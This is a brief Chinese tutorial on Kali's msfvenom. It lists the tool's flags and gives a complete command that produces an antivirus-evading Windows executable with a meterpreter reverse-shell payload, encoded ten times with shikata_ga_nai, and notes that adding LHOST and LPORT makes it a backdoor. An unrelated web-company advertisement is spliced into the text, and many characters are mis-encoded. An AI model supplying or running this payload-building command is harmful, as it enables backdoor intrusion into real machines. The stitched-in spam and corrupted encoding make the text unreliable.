現(xiàn)在依然還有很多教學(xué)視頻、資料是使用之前的kali版本。隨著更新有些命令是不適應(yīng)最新的kali的。(也是掉過坑的人)
msfvenom集成了msfpayload和msfencode,2015年之后移除了后兩項(xiàng)。再按照某些教程輸后兩個(gè)命令是不行的。
成都創(chuàng)新互聯(lián)公司主營(yíng)鳩江網(wǎng)站建設(shè)的網(wǎng)絡(luò)公司,主營(yíng)網(wǎng)站建設(shè)方案,重慶APP軟件開發(fā),鳩江h(huán)5小程序制作搭建,鳩江網(wǎng)站營(yíng)銷推廣歡迎鳩江等地區(qū)企業(yè)咨詢
msfvenom重要參數(shù):(可以使用msfvenom -h查看所有參數(shù))
-ppayload設(shè)置
-e編碼設(shè)置
-a系統(tǒng)結(jié)構(gòu),默認(rèn)x86
-spayload最大大小
-i編碼次數(shù)
-f生成文件格式
另外幾個(gè)命令:
平臺(tái)查看: msfvenom --help-platforms
指定目標(biāo)平臺(tái):--platform xxx
格式查看: msfvenom --help-formats
查看payload設(shè)置: msfvenom -p
注意:如果要?jiǎng)?chuàng)建x64的負(fù)載需使用-a x64
正確生成免殺文件:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -f exe >1.exe
如果需要生成后門文件,需要加上lhost(本地主機(jī)ip)以及l(fā)port(本地主機(jī)開放的端口)參數(shù)。
參考文章:https://www.hackers-arise.com/single-post/2017/07/31/Metasploit-Basics-Part-9-Using-msfvenom-to-Create-Custom-Payloads